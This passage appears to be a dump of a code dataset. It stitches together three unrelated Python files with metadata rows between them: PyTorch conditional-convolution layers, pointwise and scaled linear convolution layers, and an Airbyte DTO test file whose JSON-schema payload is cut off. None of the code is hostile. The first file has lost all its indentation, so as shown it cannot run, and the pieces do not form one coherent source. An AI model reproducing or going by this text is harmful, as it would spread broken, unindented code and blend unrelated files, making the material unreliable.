from torch.nn.modules.utils import _single, _pair
class CondConv1d(_ConvNd):
def __init__(self, in_channels, out_channels, kernel_size, att_inchannel, stride=1, num_workers=8, padding=0,
dilation=1, dropout_rate=0.5, groups=1, bias=True, padding_mode='zeros'):
kernel_size = _single(kernel_size)
stride = _single(stride)
padding = _single(padding)
dilation = _single(dilation)
self.isbias = bias
super(CondConv1d, self).__init__(
in_channels, out_channels * num_workers, kernel_size, stride, padding, dilation,
False, _single(0), groups, bias, padding_mode)
if num_workers < 1:
raise ValueError('num_workers must be positive integer')
self.num_workers = num_workers
# self.weights = nn.Parameter(torch.Tensor(num_workers, in_channels, out_channels // groups, kernel_size[0]))
self.weight = nn.Parameter(
self.weight.view(in_channels, out_channels, kernel_size[0], num_workers))
if bias:
self.bias = nn.Parameter(self.bias.view(out_channels, num_workers))
self.att_linear1 = nn.Linear(att_inchannel, in_channels)
self.att_linear2 = nn.Linear(in_channels, in_channels)
self.att_linear = nn.Linear(in_channels, num_workers)
self.dropout = nn.Dropout(dropout_rate)
def forward(self, x, att_x): # batchsize * 512 * 16 batchsize * 512
# x_shape = x.shape
        # (alternative) condition on both the word feature and the pooled x feature
# mix_feature = torch.tanh(
# self.att_linear1(att_x) + self.att_linear2(nn.functional.avg_pool1d(x, x_shape[2]).squeeze()))
        # condition on the word feature only
mix_feature = torch.tanh(self.att_linear1(att_x))
attention = nn.functional.softmax(self.att_linear(mix_feature), dim=1)
attention = self.dropout(attention) # batchsize * num_workers
kernel = torch.sum(attention[:, None, None, None, :] * self.weight[None, :, :, :, :], 4)
output = []
inputs = torch.split(x, 1, 0)
if self.isbias:
biases = torch.sum(attention[:, None, :] * self.bias[None, :, :], 2)
for input_tensor, one_kernel, one_bias in zip(inputs, kernel, biases):
t_out = nn.functional.conv1d(input_tensor, one_kernel, one_bias, self.stride, self.padding,
self.dilation,
self.groups)
output.append(t_out)
else:
for input_tensor, one_kernel in zip(inputs, kernel):
t_out = nn.functional.conv1d(input_tensor, one_kernel, None, self.stride, self.padding, self.dilation,
self.groups)
output.append(t_out)
return torch.cat(output, dim=0)
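# Usage sketch (assumption: in_channels == out_channels, which the kernel
# layout above requires for F.conv1d's (out, in, k) weight convention):
#   conv = CondConv1d(in_channels=16, out_channels=16, kernel_size=3,
#                     att_inchannel=300, padding=1, num_workers=4)
#   y = conv(torch.randn(2, 16, 32), torch.randn(2, 300))   # -> (2, 16, 32)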
class CondConv2d(_ConvNd):
def __init__(self, in_channels, out_channels, kernel_size, att_inchannel, stride=1, num_workers=8, padding=0,
dilation=1, dropout_rate=0.1, groups=1, bias=True, padding_mode='zeros'):
kernel_size = _pair(kernel_size)
stride = _pair(stride)
padding = _pair(padding)
dilation = _pair(dilation)
self.isbias = bias
super(CondConv2d, self).__init__(
in_channels, out_channels * num_workers, kernel_size, stride, padding, dilation,
False, _single(0), groups, bias, padding_mode)
if num_workers < 1:
raise ValueError('num_workers must be positive integer')
self.num_workers = num_workers
# self.weights = nn.Parameter(torch.Tensor(num_workers, in_channels, out_channels // groups, kernel_size[0]))
self.weight = nn.Parameter(
self.weight.view(in_channels, out_channels, kernel_size[0], kernel_size[1], num_workers))
if bias:
self.bias = nn.Parameter(self.bias.view(out_channels, num_workers))
self.att_linear1 = nn.Linear(att_inchannel, in_channels)
self.att_linear2 = nn.Linear(in_channels, in_channels)
self.att_linear = nn.Linear(in_channels, num_workers)
self.dropout = nn.Dropout(dropout_rate)
def forward(self, x, att_x, att_with_x: bool = True): # batchsize * 512 * 16 batchsize * 512
if att_with_x:
            # condition on both the word feature and the pooled x feature
mix_feature = torch.tanh(
self.att_linear1(att_x) + self.att_linear2(nn.functional.adaptive_avg_pool2d(x, (1, 1)).squeeze()))
else:
            # condition on the word feature only
mix_feature = torch.tanh(self.att_linear1(att_x))
attention = nn.functional.softmax(self.att_linear(mix_feature), dim=1)
attention = self.dropout(attention) # batchsize * num_workers
# kernel = torch.sum(attention[:, None, None, None, None, :] * self.weight[None, :, :, :, :, :], 5)
batchsize = x.size(0)
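        # Accumulate the per-sample kernels worker-by-worker (instead of the
        # single broadcast sum commented out above), presumably to bound peak
        # memory; note the buffers are created directly on CUDA, so this path
        # assumes a GPU.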
kernel = torch.zeros(batchsize, self.weight.shape[0], self.weight.shape[1], self.weight.shape[2],
self.weight.shape[3]).cuda()
for i in range(self.num_workers):
kernel += attention[:, None, None, None, None, i] * self.weight[None, :, :, :, :, i]
output = []
inputs = torch.split(x, 1, 0)
if self.isbias:
# biases = torch.sum(attention[:, None, :] * self.bias[None, :, :], 2)
biases = torch.zeros(batchsize, self.bias.shape[0]).cuda()
for i in range(self.num_workers):
biases += attention[:, None, i] * self.bias[None, :, i]
for input_tensor, one_kernel, one_bias in zip(inputs, kernel, biases):
t_out = nn.functional.conv2d(input_tensor, one_kernel, one_bias, self.stride, self.padding,
self.dilation,
self.groups)
output.append(t_out)
else:
for input_tensor, one_kernel in zip(inputs, kernel):
t_out = nn.functional.conv2d(input_tensor, one_kernel, None, self.stride, self.padding, self.dilation,
self.groups)
output.append(t_out)
return torch.cat(output, dim=0)
class EfficientCondConv2d(_ConvNd):
def __init__(self, in_channels, out_channels, kernel_size, att_inchannel, stride=1, num_workers=8, padding=0,
dilation=1, dropout_rate=0.1, groups=1, bias=True, padding_mode='zeros'):
kernel_size = _pair(kernel_size)
stride = _pair(stride)
padding = _pair(padding)
dilation = _pair(dilation)
self.isbias = bias
super(EfficientCondConv2d, self).__init__(
in_channels, out_channels * num_workers, kernel_size, stride, padding, dilation,
False, _single(0), groups, bias, padding_mode)
if num_workers < 1:
            raise ValueError('num_workers must be a positive integer')
self.num_workers = num_workers
self.weight = nn.Parameter(self.weight.view(num_workers, -1))
if bias:
self.bias = nn.Parameter(self.bias.view(num_workers, -1))
self.att_linear1 = nn.Linear(att_inchannel, in_channels)
self.att_linear2 = nn.Linear(in_channels, in_channels)
self.att_linear = nn.Linear(in_channels, num_workers)
self.dropout = nn.Dropout(dropout_rate)
    def forward(self, x, att_x, att_with_x: bool = True):  # x: batchsize * 512 * 16 * 16, att_x: batchsize * 512
        if att_with_x:
            # combine the word attention input with pooled features from x;
            # squeeze only the spatial dims so a batch size of 1 is preserved
            mix_feature = torch.tanh(
                self.att_linear1(att_x) + self.att_linear2(
                    nn.functional.adaptive_avg_pool2d(x, (1, 1)).squeeze(2).squeeze(2)))
        else:
            # use the word embedding alone
            mix_feature = torch.tanh(self.att_linear1(att_x))
attention = nn.functional.softmax(self.att_linear(mix_feature), dim=1)
attention = self.dropout(attention) # batchsize * num_workers
kernel = torch.matmul(attention, self.weight).view(-1, self.out_channels // self.num_workers, self.in_channels,
self.kernel_size[0],
self.kernel_size[1]) # batchsize * xxxx
output = []
inputs = torch.split(x, 1, 0)
if self.isbias:
bias = torch.matmul(attention, self.bias).view(-1, self.out_channels // self.num_workers)
for i, input_tensor in enumerate(inputs):
t_out = nn.functional.conv2d(input_tensor, kernel[i, :, :, :, :], bias[i, :], self.stride,
self.padding, self.dilation, self.groups)
output.append(t_out)
else:
for i, input_tensor in enumerate(inputs):
t_out = nn.functional.conv2d(input_tensor, kernel[i, :, :, :, :], None, self.stride, self.padding,
self.dilation, self.groups)
output.append(t_out)
return torch.cat(output, dim=0)
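# --- Illustrative usage sketch (not part of the module API) ------------------
# A hypothetical CPU smoke test for EfficientCondConv2d; every shape here is
# an arbitrary demo value, not a requirement of the layer.
def _demo_efficient_condconv2d():
    layer = EfficientCondConv2d(in_channels=4, out_channels=6, kernel_size=3,
                                att_inchannel=16, num_workers=8, padding=1)
    x = torch.randn(2, 4, 8, 8)   # batchsize * channels * H * W
    att_x = torch.randn(2, 16)    # batchsize * att_inchannel
    return layer(x, att_x)        # expected shape: (2, 6, 8, 8)
# ------------------------------------------------------------------------------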
class MoreEfficientCondConv2d(_ConvNd):
def __init__(self, in_channels, out_channels, kernel_size, att_inchannel, stride=1, num_workers=8, padding=0,
dilation=1, dropout_rate=0.1, groups=1, bias=True, padding_mode='zeros'):
kernel_size = _pair(kernel_size)
stride = _pair(stride)
padding = _pair(padding)
dilation = _pair(dilation)
self.isbias = bias
super(MoreEfficientCondConv2d, self).__init__(
in_channels, out_channels * num_workers, kernel_size, stride, padding, dilation,
False, _single(0), groups, bias, padding_mode)
if num_workers < 1:
            raise ValueError('num_workers must be a positive integer')
self.true_out_channels = out_channels
self.weight = nn.Parameter(self.weight.view(num_workers, -1))
if bias:
self.bias = nn.Parameter(self.bias.view(num_workers, -1))
self.att_linear1 = nn.Linear(att_inchannel, in_channels)
self.att_linear2 = nn.Linear(in_channels, in_channels)
self.att_linear = nn.Linear(in_channels, num_workers)
self.dropout = nn.Dropout(dropout_rate)
def forward(self, x, att_x, att_with_x: bool = True,
att_with_att: bool = True): # batchsize * 512 * 16 * 16 batchsize * 512
        if att_with_x and att_with_att:
            # combine the word attention input with pooled features from x
            mix_feature = torch.tanh(
                self.att_linear1(att_x) + self.att_linear2(nn.functional.adaptive_avg_pool2d(x, (1, 1)).squeeze(2).squeeze(2)))
        elif not att_with_x and att_with_att:
            # use the word embedding alone
            mix_feature = torch.tanh(self.att_linear1(att_x))
        elif att_with_x and not att_with_att:
            # use pooled features from x alone
            mix_feature = torch.tanh(self.att_linear2(nn.functional.adaptive_avg_pool2d(x, (1, 1)).squeeze(2).squeeze(2)))
        else:
            raise ValueError('at least one attention input must be enabled in CondConv')
attention = nn.functional.softmax(self.att_linear(mix_feature), dim=1)
attention = self.dropout(attention) # batchsize * num_workers
kernel = torch.matmul(attention, self.weight).view(-1, self.in_channels, self.kernel_size[0],
self.kernel_size[1])
b, c, w, h = x.size()
inputs = x.view(1, -1, w, h)
if self.isbias:
bias = torch.matmul(attention, self.bias).view(-1)
else:
bias = None
t_out = nn.functional.conv2d(inputs, kernel, bias, self.stride, self.padding, self.dilation, b)
output = t_out.view(b, self.true_out_channels, t_out.size(2), t_out.size(3))
return output
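# --- Illustrative sketch (not part of the module API) ------------------------
# MoreEfficientCondConv2d replaces the per-sample Python loop with a single
# grouped convolution (groups = batchsize) after folding the batch into the
# channel dimension. A self-contained equivalence check with made-up shapes:
def _demo_grouped_conv_trick():
    b, c_in, c_out, h, w, k = 3, 4, 6, 8, 8, 3
    x = torch.randn(b, c_in, h, w)
    kernels = torch.randn(b, c_out, c_in, k, k)  # one kernel per sample
    # per-sample loop
    loop_out = torch.cat([nn.functional.conv2d(x[i:i + 1], kernels[i], padding=1)
                          for i in range(b)], dim=0)
    # grouped-conv equivalent: stack the batch into channels
    grouped = nn.functional.conv2d(x.view(1, b * c_in, h, w),
                                   kernels.view(b * c_out, c_in, k, k),
                                   padding=1, groups=b)
    assert torch.allclose(loop_out, grouped.view(b, c_out, h, w), atol=1e-5)
# ------------------------------------------------------------------------------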
class LittleMoreEfficientCondConv2d(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, att_inchannel, stride=1, num_workers=8, padding=0,
dilation=1, dropout_rate=0.1, groups=1, bias=True, padding_mode='zeros'):
self.in_channels = in_channels
self.out_channels = out_channels
self.kernel_size = _pair(kernel_size)
self.stride = _pair(stride)
self.padding = _pair(padding)
self.dilation = _pair(dilation)
self.isbias = bias
super(LittleMoreEfficientCondConv2d, self).__init__()
if num_workers < 1:
            raise ValueError('num_workers must be a positive integer')
self.true_out_channels = out_channels
self.weight_linear = nn.Linear(num_workers,
out_channels * in_channels * self.kernel_size[0] *
self.kernel_size[1], bias=False)
if bias:
self.bias_linear = nn.Linear(num_workers, out_channels, bias=False)
self.att_linear1 = nn.Linear(att_inchannel, in_channels)
self.att_linear2 = nn.Linear(in_channels, in_channels)
self.att_linear = nn.Linear(in_channels, num_workers)
self.dropout = nn.Dropout(dropout_rate)
def forward(self, x, att_x, att_with_x: bool = True): # batchsize * 512 * 16 * 16 batchsize * 512
        if att_with_x:
            # combine the word attention input with pooled features from x;
            # squeeze only the spatial dims so a batch size of 1 is preserved
            mix_feature = torch.tanh(
                self.att_linear1(att_x) + self.att_linear2(
                    nn.functional.adaptive_avg_pool2d(x, (1, 1)).squeeze(2).squeeze(2)))
        else:
            # use the word embedding alone
            mix_feature = torch.tanh(self.att_linear1(att_x))
attention = nn.functional.softmax(self.att_linear(mix_feature), dim=1)
attention = self.dropout(attention) # batchsize * num_workers
kernel = self.weight_linear(attention).view(-1, self.in_channels, self.kernel_size[0], self.kernel_size[1])
if self.isbias:
bias = self.bias_linear(attention).view(-1)
else:
bias = None
b, c, w, h = x.size()
inputs = x.view(1, -1, w, h)
t_out = nn.functional.conv2d(inputs, kernel, bias, self.stride, self.padding, self.dilation, b)
output = t_out.view(b, self.true_out_channels, t_out.size(2), t_out.size(3))
return output | 43.470588 | 127 | 0.606225 | 1,762 | 14,041 | 4.598751 | 0.067537 | 0.06294 | 0.037517 | 0.033691 | 0.891522 | 0.869184 | 0.86289 | 0.845243 | 0.83142 | 0.823399 | 0 | 0.020668 | 0.283242 | 14,041 | 323 | 128 | 43.470588 | 0.784479 | 0.066235 | 0 | 0.726087 | 0 | 0 | 0.018039 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0 | 0.017391 | 0 | 0.104348 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c89b95293509a2424ba4dd5796861f31047f9325 | 3,433 | py | Python | ckconv/nn/linear.py | boczekbartek/flexconv | 610b5be3a846bcc1436275daaad89482b6b8e7cc | [
"BSD-2-Clause"
] | 41 | 2021-10-19T03:13:39.000Z | 2022-03-31T17:08:14.000Z | ckconv/nn/linear.py | boczekbartek/flexconv | 610b5be3a846bcc1436275daaad89482b6b8e7cc | [
"BSD-2-Clause"
] | 3 | 2021-10-19T17:32:14.000Z | 2021-12-23T02:42:07.000Z | ckconv/nn/linear.py | boczekbartek/flexconv | 610b5be3a846bcc1436275daaad89482b6b8e7cc | [
"BSD-2-Clause"
] | 3 | 2021-11-01T14:29:35.000Z | 2022-03-30T00:36:50.000Z | import torch
import torch.nn as nn
def Linear1d(
in_channels: int,
out_channels: int,
stride: int = 1,
bias: bool = True,
) -> torch.nn.Module:
"""
Implements a Linear Layer in terms of a point-wise convolution.
"""
return nn.Conv1d(in_channels, out_channels, kernel_size=1, stride=stride, bias=bias)
def Linear2d(
in_channels: int,
out_channels: int,
stride: int = 1,
bias: bool = True,
) -> torch.nn.Module:
"""
Implements a Linear Layer in terms of a point-wise convolution.
"""
return nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=stride, bias=bias)
def Linear3d(
in_channels: int,
out_channels: int,
stride: int = 1,
bias: bool = True,
) -> torch.nn.Module:
"""
Implements a Linear Layer in terms of a point-wise convolution.
"""
return nn.Conv3d(in_channels, out_channels, kernel_size=1, stride=stride, bias=bias)
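def _linear2d_sanity_check():
    """
    Illustrative only (not part of the library): a 1x1 convolution is a linear
    map over channels, so Linear2d should match nn.Linear applied per spatial
    position once the weights are shared. Shapes are arbitrary demo values.
    """
    lin2d = Linear2d(8, 16)
    dense = nn.Linear(8, 16)
    with torch.no_grad():
        dense.weight.copy_(lin2d.weight.view(16, 8))
        dense.bias.copy_(lin2d.bias)
    x = torch.randn(2, 8, 5, 5)
    y_conv = lin2d(x)
    y_dense = dense(x.permute(0, 2, 3, 1)).permute(0, 3, 1, 2)
    assert torch.allclose(y_conv, y_dense, atol=1e-5)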
class MultipliedLinear1d(torch.nn.Conv1d):
def __init__(
self,
in_channels: int,
out_channels: int,
omega_0: float,
learn_omega_0: bool,
bias: bool,
):
"""
Implements a Linear Layer of the form y = omega_0 * W x + b, where x is 1 dimensional
"""
super(MultipliedLinear1d, self).__init__(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=1,
stride=1,
padding=0,
dilation=1,
bias=bias,
)
# omega_0
if learn_omega_0:
self.omega_0 = torch.nn.Parameter(torch.Tensor(1))
with torch.no_grad():
self.omega_0.fill_(omega_0)
else:
tensor_omega_0 = torch.zeros(1)
tensor_omega_0.fill_(omega_0)
self.register_buffer("omega_0", tensor_omega_0)
def forward(self, x: torch.Tensor) -> torch.Tensor:
out = self.omega_0 * torch.nn.functional.conv1d(
x, weight=self.weight, bias=None, stride=1, padding=0
)
if self.bias is not None:
out = out + self.bias.view(1, -1, *((out.ndim - 2) * [1]))
return out
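def _multiplied_linear1d_demo():
    """
    Illustrative only (not part of the library): checks that MultipliedLinear1d
    computes y = omega_0 * W x + b, with the bias added after the scaling.
    Shapes and omega_0 are arbitrary demo values.
    """
    layer = MultipliedLinear1d(in_channels=4, out_channels=8, omega_0=30.0,
                               learn_omega_0=False, bias=True)
    x = torch.randn(2, 4, 10)
    reference = 30.0 * torch.nn.functional.conv1d(x, layer.weight) + layer.bias.view(1, -1, 1)
    assert torch.allclose(layer(x), reference, atol=1e-5)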
class MultipliedLinear2d(torch.nn.Conv2d):
def __init__(
self,
in_channels: int,
out_channels: int,
omega_0: float,
learn_omega_0: bool,
bias: bool,
):
"""
Implements a Linear Layer of the form y = omega_0 * W x + b, where x is 2 dimensional
"""
super(MultipliedLinear2d, self).__init__(
in_channels=in_channels,
out_channels=out_channels,
kernel_size=1,
stride=1,
padding=0,
dilation=1,
bias=bias,
)
# omega_0
if learn_omega_0:
self.omega_0 = torch.nn.Parameter(torch.Tensor(1))
with torch.no_grad():
self.omega_0.fill_(omega_0)
else:
tensor_omega_0 = torch.zeros(1)
tensor_omega_0.fill_(omega_0)
self.register_buffer("omega_0", tensor_omega_0)
def forward(self, x: torch.Tensor) -> torch.Tensor:
out = self.omega_0 * torch.nn.functional.conv2d(
x, weight=self.weight, bias=None, stride=1, padding=0
)
if self.bias is not None:
out = out + self.bias.view(1, -1, *((out.ndim - 2) * [1]))
return out
| 28.139344 | 93 | 0.572677 | 445 | 3,433 | 4.213483 | 0.166292 | 0.0896 | 0.070933 | 0.042667 | 0.8736 | 0.8736 | 0.8736 | 0.8736 | 0.8736 | 0.8736 | 0 | 0.03176 | 0.321293 | 3,433 | 121 | 94 | 28.371901 | 0.772961 | 0.11069 | 0 | 0.788889 | 0 | 0 | 0.00473 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.077778 | false | 0 | 0.033333 | 0 | 0.188889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c89ea0a2eeb4d4099f5ea59ccc813625286f4520 | 50,469 | py | Python | tests/test_airbyte_dto_factory.py | garden-of-delete/airbyte-tentacle | 6ad7bbf41f4707fe8868e62cc3b22593f68093d5 | [
"Unlicense"
] | 9 | 2021-06-19T06:44:33.000Z | 2021-10-09T21:54:18.000Z | tests/test_airbyte_dto_factory.py | garden-of-delete/airbyte-tentacle | 6ad7bbf41f4707fe8868e62cc3b22593f68093d5 | [
"Unlicense"
] | 10 | 2021-06-11T08:36:04.000Z | 2021-10-08T01:31:56.000Z | tests/test_airbyte_dto_factory.py | garden-of-delete/airbyte-tentacle | 6ad7bbf41f4707fe8868e62cc3b22593f68093d5 | [
"Unlicense"
] | 1 | 2021-06-29T16:34:31.000Z | 2021-06-29T16:34:31.000Z | import pytest
from tests.test_fixtures import *
def test_source_dto__to_payload(dummy_source_dto):
"""
Test SourceDto.to_payload
Verifies the data is not mutated by to_payload
"""
payload = dummy_source_dto.to_payload()
assert payload['sourceDefinitionId'] == 'ef69ef6e-aa7f-4af1-a01d-ef775033524e'
assert payload['sourceId'] == '7d95ec85-47c6-42d4-a7a2-8e5c22c810d2'
assert payload['workspaceId'] == 'f3b9e848-790c-4cdd-a475-5c6bb156dc10'
assert payload['connectionConfiguration'] == {'access_token': '**********'}
assert payload['name'] == 'apache/superset'
assert payload['sourceName'] == 'GitHub'
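# For orientation (hypothetical sketch, not the project's actual class): a
# SourceDto satisfying the assertions above only needs snake_case fields and a
# to_payload that maps them to the API's camelCase keys:
#
#     from dataclasses import dataclass
#
#     @dataclass
#     class MinimalSourceDto:
#         source_definition_id: str = None
#         source_id: str = None
#         workspace_id: str = None
#         connection_configuration: dict = None
#         name: str = None
#         source_name: str = None
#
#         def to_payload(self):
#             return {'sourceDefinitionId': self.source_definition_id,
#                     'sourceId': self.source_id,
#                     'workspaceId': self.workspace_id,
#                     'connectionConfiguration': self.connection_configuration,
#                     'name': self.name,
#                     'sourceName': self.source_name}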
def test_destination_dto__to_payload(dummy_destination_dto):
"""
Test DestinationDto.to_payload
Verifies the data is not mutated by to_payload
"""
payload = dummy_destination_dto.to_payload()
assert payload['destinationDefinitionId'] == '25c5221d-dce2-4163-ade9-739ef790f503'
assert payload['destinationId'] == 'a41cb2f8-fcce-4c91-adfe-37c4586609f5'
assert payload['workspaceId'] == 'f3b9e848-790c-4cdd-a475-5c6bb156dc10'
assert payload['connectionConfiguration']['database'] == 'postgres'
assert payload['connectionConfiguration']['host'] == 'hostname.com'
assert payload['connectionConfiguration']['schema'] == 'demo'
assert payload['connectionConfiguration']['username'] == 'devrel_master'
assert payload['name'] == 'devrel-rds'
assert payload['destinationName'] == 'Postgres'
def test_connection_dto__to_payload(dummy_connection_dto):
"""
Test ConnectionDto.to_payload
Verifies the data is not mutated by to_payload
"""
payload = dummy_connection_dto.to_payload()
assert payload['connectionId'] == '10290824-9305-47cc-8966-6dd032abd3c0'
assert payload['sourceId'] == '7d95ec85-47c6-42d4-a7a2-8e5c22c810d2'
assert payload['destinationId'] == 'a41cb2f8-fcce-4c91-adfe-37c4586609f5'
assert payload['name'] == 'superset-to-postgres'
assert payload['prefix'] == 'github_superset_'
assert payload['schedule'] == {'units': 24, 'timeUnit': 'hours'}
assert payload['status'] == 'active'
assert payload['syncCatalog'] == {'streams': [{'stream': {'name': 'assignees', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'type': {'type': ['null', 'string']}, 'login': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'gists_url': {'type': ['null', 'string']}, 'repos_url': {'type': ['null', 'string']}, 'avatar_url': {'type': ['null', 'string']}, 'events_url': {'type': ['null', 'string']}, 'repository': {'type': ['string']}, 'site_admin': {'type': ['null', 'boolean']}, 'gravatar_id': {'type': ['null', 'string']}, 'starred_url': {'type': ['null', 'string']}, 'followers_url': {'type': ['null', 'string']}, 'following_url': {'type': ['null', 'string']}, 'organizations_url': {'type': ['null', 'string']}, 'subscriptions_url': {'type': ['null', 'string']}, 'received_events_url': {'type': ['null', 'string']}}}, 'supportedSyncModes': ['full_refresh'], 'sourceDefinedCursor': None, 'defaultCursorField': [], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': [], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'assignees', 'selected': True}}, {'stream': {'name': 'branches', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'name': {'type': ['null', 'string']}, 'commit': {'type': ['null', 'object'], 'properties': {'sha': {'type': ['null', 'string']}, 'url': {'type': ['null', 'string']}}}, 'protected': {'type': ['null', 'boolean']}, 'protection': {'type': ['null', 'object'], 'properties': {'required_status_checks': {'type': ['null', 'object'], 'properties': {'contexts': {'type': ['null', 'array'], 'items': [{'type': ['null', 'string']}, {'type': ['null', 'string']}]}, 'enforcement_level': {'type': ['null', 'string']}}}}}, 'repository': {'type': ['string']}, 'protection_url': {'type': ['null', 'string']}}}, 'supportedSyncModes': ['full_refresh'], 'sourceDefinedCursor': None, 'defaultCursorField': [], 'sourceDefinedPrimaryKey': [], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': [], 'destinationSyncMode': 'append', 'primaryKey': [], 'aliasName': 'branches', 'selected': True}}, {'stream': {'name': 'collaborators', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'type': {'type': ['null', 'string']}, 'login': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'gists_url': {'type': ['null', 'string']}, 'repos_url': {'type': ['null', 'string']}, 'avatar_url': {'type': ['null', 'string']}, 'events_url': {'type': ['null', 'string']}, 'repository': {'type': ['string']}, 'site_admin': {'type': ['null', 'boolean']}, 'gravatar_id': {'type': ['null', 'string']}, 'permissions': {'type': ['null', 'object'], 'properties': {'pull': {'type': ['null', 'boolean']}, 'push': {'type': ['null', 'boolean']}, 'admin': {'type': ['null', 'boolean']}}}, 'starred_url': {'type': ['null', 'string']}, 'followers_url': {'type': ['null', 'string']}, 'following_url': {'type': ['null', 'string']}, 'organizations_url': {'type': ['null', 'string']}, 'subscriptions_url': {'type': ['null', 'string']}, 'received_events_url': {'type': ['null', 'string']}}}, 'supportedSyncModes': ['full_refresh'], 
'sourceDefinedCursor': None, 'defaultCursorField': [], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': [], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'collaborators', 'selected': True}}, {'stream': {'name': 'comments', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'body': {'type': ['null', 'string']}, 'user': {'type': ['null', 'object'], 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'type': {'type': ['null', 'string']}, 'login': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'gists_url': {'type': ['null', 'string']}, 'repos_url': {'type': ['null', 'string']}, 'avatar_url': {'type': ['null', 'string']}, 'events_url': {'type': ['null', 'string']}, 'site_admin': {'type': ['null', 'boolean']}, 'gravatar_id': {'type': ['null', 'string']}, 'starred_url': {'type': ['null', 'string']}, 'followers_url': {'type': ['null', 'string']}, 'following_url': {'type': ['null', 'string']}, 'organizations_url': {'type': ['null', 'string']}, 'subscriptions_url': {'type': ['null', 'string']}, 'received_events_url': {'type': ['null', 'string']}}}, 'node_id': {'type': ['null', 'string']}, 'user_id': {'type': ['null', 'integer']}, 'html_url': {'type': ['null', 'string']}, 'issue_url': {'type': ['null', 'string']}, 'created_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'repository': {'type': ['string']}, 'updated_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'author_association': {'type': ['null', 'string']}}}, 'supportedSyncModes': ['full_refresh', 'incremental'], 'sourceDefinedCursor': True, 'defaultCursorField': ['updated_at'], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': ['updated_at'], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'comments', 'selected': True}}, {'stream': {'name': 'commit_comments', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'body': {'type': ['null', 'string']}, 'line': {'type': ['null', 'integer']}, 'path': {'type': ['null', 'string']}, 'user': {'type': ['null', 'object'], 'properties': {'id': {'type': ['null', 'integer']}, 'url': {'type': ['null', 'string']}, 'type': {'type': ['null', 'string']}, 'login': {'type': ['null', 'string']}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'gists_url': {'type': ['null', 'string']}, 'repos_url': {'type': ['null', 'string']}, 'avatar_url': {'type': ['null', 'string']}, 'events_url': {'type': ['null', 'string']}, 'site_admin': {'type': ['null', 'boolean']}, 'gravatar_id': {'type': ['null', 'string']}, 'starred_url': {'type': ['null', 'string']}, 'followers_url': {'type': ['null', 'string']}, 'following_url': {'type': ['null', 'string']}, 'organizations_url': {'type': ['null', 'string']}, 'subscriptions_url': {'type': ['null', 'string']}, 'received_events_url': {'type': ['null', 'string']}}}, 'node_id': {'type': ['null', 'string']}, 'html_url': {'type': ['null', 'string']}, 'position': {'type': ['null', 'integer']}, 'commit_id': {'type': ['null', 'string']}, 'created_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'repository': {'type': 
['string']}, 'updated_at': {'type': ['null', 'string'], 'format': 'date-time'}, 'author_association': {'type': ['null', 'string']}}}, 'supportedSyncModes': ['full_refresh', 'incremental'], 'sourceDefinedCursor': True, 'defaultCursorField': ['updated_at'], 'sourceDefinedPrimaryKey': [['id']], 'namespace': None}, 'config': {'syncMode': 'full_refresh', 'cursorField': ['updated_at'], 'destinationSyncMode': 'append', 'primaryKey': [['id']], 'aliasName': 'commit_comments', 'selected': True}}, {'stream': {'name': 'commits', 'jsonSchema': {'type': 'object', '$schema': 'http://json-schema.org/draft-07/schema#', 'properties': {'sha': {'type': ['null', 'string']}, 'url': {'type': ['null', 'string']}, 'commit': {'type': ['null', 'object'], 'properties': {'url': {'type': ['null', 'string']}, 'tree': {'type': ['null', 'object'], 'properties': {'sha': {'type': ['null', 'string']}, 'url': {'type': ['null', 'string']}}}, 'author': {'type': ['null', 'object'], 'properties': {'date': {'type': ['null', 'string'], 'format': 'date-time'}, 'name': {'type': ['null', 'string']}, 'email': {'type': ['null', 'string']}}}, 'message': {'type': ['null', 'string']}, 'committer': 